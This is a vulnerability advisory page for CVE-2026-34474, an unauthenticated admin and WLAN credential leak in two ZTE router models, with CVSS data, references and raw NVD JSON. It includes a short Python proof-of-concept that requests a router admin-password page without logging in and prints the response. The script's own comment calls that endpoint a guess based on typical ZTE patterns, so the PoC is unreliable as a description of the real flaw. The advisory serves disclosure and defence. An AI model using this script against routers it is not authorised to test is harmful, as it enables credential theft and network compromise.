CVE-2026-34474

Description

Sensitive data exposure leading to admin/WLAN credential leak in ZTE ZXHN H298A 1.1 and H108N 2.6. A crafted request to the router web interface can expose sensitive device and account information. In affected builds, the response may include the administrator password and WLAN PSK, enabling authentication bypass and network compromise. Some firmware versions may expose only partial identifiers (e.g., serial number, ESSID, MAC addresses).

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ZTE ZXHN H298A 1.1

ZTE ZXHN H108N 2.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target = "http://192.168.1.1" # Replace with actual target IP

# Vulnerable endpoint example (based on typical ZTE patterns)
endpoint = "/getpage.gch?pid=1002&nextpage=telecom_admin_web_admin_password_t.gch"

try:
    # Send crafted request without authentication
    response = requests.get(target + endpoint, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential vulnerability detected!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34474
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34474
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34474/
[4] VulDB https://vuldb.com/cve/CVE-2026-34474
[5] https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9
[6] https://www.zte.com.cn/global/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34474", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:36.523", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Sensitive data exposure leading to admin/WLAN credential leak in ZTE ZXHN H298A 1.1 and H108N 2.6. A crafted request to the router web interface can expose sensitive device and account information. In affected builds, the response may include the administrator password and WLAN PSK, enabling authentication bypass and network compromise. Some firmware versions may expose only partial identifiers (e.g., serial number, ESSID, MAC addresses)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9", "source": "[email protected]"}, {"url": "https://www.zte.com.cn/global/", "source": "[email protected]"}]}}